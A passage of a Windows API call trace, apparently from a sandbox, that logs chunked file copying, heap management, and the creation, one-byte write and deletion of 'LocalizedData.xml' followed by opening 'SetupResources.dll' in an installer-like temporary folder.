[0068.727] SetLastError (dwErrCode=0x0) [0068.727] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.727] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.728] GetLastError () returned 0x0 [0068.728] SetLastError (dwErrCode=0x0) [0068.728] GetLastError () returned 0x0 [0068.728] SetLastError (dwErrCode=0x0) [0068.728] GetLastError () returned 0x0 [0068.728] SetLastError (dwErrCode=0x0) [0068.728] GetLastError () returned 0x0 [0068.728] SetLastError (dwErrCode=0x0) [0068.728] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.728] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.729] GetLastError () returned 0x0 [0068.729] SetLastError (dwErrCode=0x0) [0068.729] GetLastError () returned 0x0 [0068.729] SetLastError (dwErrCode=0x0) [0068.729] GetLastError () returned 0x0 [0068.729] SetLastError (dwErrCode=0x0) [0068.729] GetLastError () returned 0x0 [0068.729] SetLastError (dwErrCode=0x0) [0068.729] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.729] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.729] GetLastError () returned 0x0 [0068.730] SetLastError (dwErrCode=0x0) [0068.730] GetLastError () returned 0x0 [0068.730] SetLastError (dwErrCode=0x0) [0068.730] GetLastError () returned 0x0 [0068.730] SetLastError (dwErrCode=0x0) [0068.730] GetLastError () returned 0x0 [0068.730] SetLastError (dwErrCode=0x0) [0068.730] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.730] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.730] GetLastError () returned 0x0 [0068.730] SetLastError (dwErrCode=0x0) [0068.731] GetLastError () returned 0x0 [0068.731] SetLastError (dwErrCode=0x0) [0068.731] GetLastError () returned 0x0 [0068.731] SetLastError (dwErrCode=0x0) [0068.731] GetLastError () returned 0x0 [0068.731] SetLastError (dwErrCode=0x0) [0068.731] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.731] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.731] GetLastError () returned 0x0 [0068.731] SetLastError (dwErrCode=0x0) [0068.731] GetLastError () returned 0x0 [0068.731] SetLastError (dwErrCode=0x0) [0068.732] GetLastError () returned 0x0 [0068.732] SetLastError (dwErrCode=0x0) [0068.732] GetLastError () returned 0x0 [0068.732] SetLastError (dwErrCode=0x0) [0068.732] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.732] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.732] GetLastError () returned 0x0 [0068.732] SetLastError (dwErrCode=0x0) [0068.732] GetLastError () returned 0x0 [0068.732] SetLastError (dwErrCode=0x0) [0068.732] GetLastError () returned 0x0 [0068.732] SetLastError (dwErrCode=0x0) [0068.733] GetLastError () returned 0x0 [0068.733] SetLastError (dwErrCode=0x0) [0068.733] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.733] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.733] GetLastError () returned 0x0 [0068.733] SetLastError (dwErrCode=0x0) [0068.733] GetLastError () returned 0x0 [0068.733] SetLastError (dwErrCode=0x0) [0068.733] GetLastError () returned 0x0 [0068.733] SetLastError (dwErrCode=0x0) [0068.734] GetLastError () returned 0x0 [0068.734] SetLastError (dwErrCode=0x0) [0068.734] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.734] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.734] GetLastError () returned 0x0 [0068.734] SetLastError (dwErrCode=0x0) [0068.734] GetLastError () returned 0x0 [0068.734] SetLastError (dwErrCode=0x0) [0068.734] GetLastError () returned 0x0 [0068.734] SetLastError (dwErrCode=0x0) [0068.734] GetLastError () returned 0x0 [0068.734] SetLastError (dwErrCode=0x0) [0068.735] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.735] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.735] GetLastError () returned 0x0 [0068.735] SetLastError (dwErrCode=0x0) [0068.735] GetLastError () returned 0x0 [0068.735] SetLastError (dwErrCode=0x0) [0068.735] GetLastError () returned 0x0 [0068.735] SetLastError (dwErrCode=0x0) [0068.735] GetLastError () returned 0x0 [0068.735] SetLastError (dwErrCode=0x0) [0068.735] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.736] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.736] GetLastError () returned 0x0 [0068.736] SetLastError (dwErrCode=0x0) [0068.736] GetLastError () returned 0x0 [0068.736] SetLastError (dwErrCode=0x0) [0068.736] GetLastError () returned 0x0 [0068.736] SetLastError (dwErrCode=0x0) [0068.736] GetLastError () returned 0x0 [0068.736] SetLastError (dwErrCode=0x0) [0068.736] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.736] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.737] GetLastError () returned 0x0 [0068.737] SetLastError (dwErrCode=0x0) [0068.737] GetLastError () returned 0x0 [0068.737] SetLastError (dwErrCode=0x0) [0068.737] GetLastError () returned 0x0 [0068.737] SetLastError (dwErrCode=0x0) [0068.737] GetLastError () returned 0x0 [0068.737] SetLastError (dwErrCode=0x0) [0068.737] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.737] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.737] GetLastError () returned 0x0 [0068.738] SetLastError (dwErrCode=0x0) [0068.738] GetLastError () returned 0x0 [0068.738] SetLastError (dwErrCode=0x0) [0068.738] GetLastError () returned 0x0 [0068.738] SetLastError (dwErrCode=0x0) [0068.738] GetLastError () returned 0x0 [0068.738] SetLastError (dwErrCode=0x0) [0068.738] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.738] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.738] GetLastError () returned 0x0 [0068.738] SetLastError (dwErrCode=0x0) [0068.738] GetLastError () returned 0x0 [0068.739] SetLastError (dwErrCode=0x0) [0068.739] GetLastError () returned 0x0 [0068.739] SetLastError (dwErrCode=0x0) [0068.739] GetLastError () returned 0x0 [0068.739] SetLastError (dwErrCode=0x0) [0068.739] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x712, lpOverlapped=0x0) returned 1 [0068.739] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.739] GetLastError () returned 0x0 [0068.739] SetLastError (dwErrCode=0x0) [0068.739] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0068.739] GetLastError () returned 0x0 [0068.739] SetLastError (dwErrCode=0x0) [0068.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7cee0 [0068.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0068.740] GetLastError () returned 0x0 [0068.740] SetLastError (dwErrCode=0x0) [0068.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0068.740] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x720, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0x720, lpOverlapped=0x0) returned 1 [0068.740] GetLastError () returned 0x0 [0068.740] SetLastError (dwErrCode=0x0) [0068.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0068.740] GetLastError () returned 0x0 [0068.740] SetLastError (dwErrCode=0x0) [0068.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0068.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0068.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0068.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0068.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0068.740] CloseHandle (hObject=0x420) returned 1 [0068.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0068.743] CloseHandle (hObject=0x410) returned 1 [0068.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0068.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0068.743] AreFileApisANSI () returned 1 [0068.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x716f0 [0068.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 45 [0068.744] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.745] GetFileType (hFile=0x410) returned 0x1 [0068.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0068.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0068.745] GetLastError () returned 0xb7 [0068.745] SetLastError (dwErrCode=0xb7) [0068.745] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0068.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0068.746] CloseHandle (hObject=0x410) returned 1 [0068.746] AreFileApisANSI () returned 1 [0068.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.746] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0068.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 45 [0068.747] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml")) returned 1 [0068.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0068.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0068.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0068.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.748] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0068.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0068.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0068.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0068.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0068.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0068.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0068.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0068.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0068.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0068.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0068.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0068.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0068.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.749] AreFileApisANSI () returned 1 [0068.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0068.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0068.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.749] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0068.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0068.749] AreFileApisANSI () returned 1 [0068.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0068.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 46 [0068.749] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.750] GetFileType (hFile=0x410) returned 0x1 [0068.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0068.750] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0068.750] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0068.750] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0068.750] CloseHandle (hObject=0x410) returned 1 [0068.750] AreFileApisANSI () returned 1 [0068.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0068.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 46 [0068.953] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.953] GetFileType (hFile=0x410) returned 0x1 [0068.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.953] CloseHandle (hObject=0x410) returned 1 [0068.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 